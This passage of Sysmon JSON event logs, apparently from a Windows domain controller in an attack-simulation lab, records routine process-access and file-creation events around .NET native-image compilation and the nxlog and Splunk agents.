{E2A3D6B1-12E8-5F25-0000-0010F23E0A00}\r\nTargetProcessId: 4708\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:52.071","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12E8-5F25-0000-0010F23E0A00}","TargetProcessId":"4708","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7059,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:52.556\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:52.556","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7060,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:59:52.571\r\nProcessGuid: {E2A3D6B1-12E8-5F25-0000-0010F23E0A00}\r\nProcessId: 4708\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1264-0\\System.Transactions.dll\r\nCreationUtcTime: 2020-08-01 06:59:52.571","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:59:52.571","ProcessGuid":"{E2A3D6B1-12E8-5F25-0000-0010F23E0A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1264-0\\System.Transactions.dll","CreationUtcTime":"2020-08-01 06:59:52.571","EventReceivedTime":"2020-08-01 06:59:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7061,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:52.618\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12E8-5F25-0000-0010BE420A00}\r\nTargetProcessId: 1576\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:52.618","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12E8-5F25-0000-0010BE420A00}","TargetProcessId":"1576","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7062,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:52.618\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12E8-5F25-0000-0010BE420A00}\r\nTargetProcessId: 1576\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:52.618","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12E8-5F25-0000-0010BE420A00}","TargetProcessId":"1576","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7063,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:52.618\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12E8-5F25-0000-0010BE420A00}\r\nTargetProcessId: 1576\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:52.618","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12E8-5F25-0000-0010BE420A00}","TargetProcessId":"1576","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7064,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:53.181\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12E9-5F25-0000-0010F4460A00}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:53.181","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12E9-5F25-0000-0010F4460A00}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7065,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:53.181\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12E9-5F25-0000-0010F4460A00}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:53.181","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12E9-5F25-0000-0010F4460A00}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7066,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:53.181\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12E9-5F25-0000-0010F4460A00}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 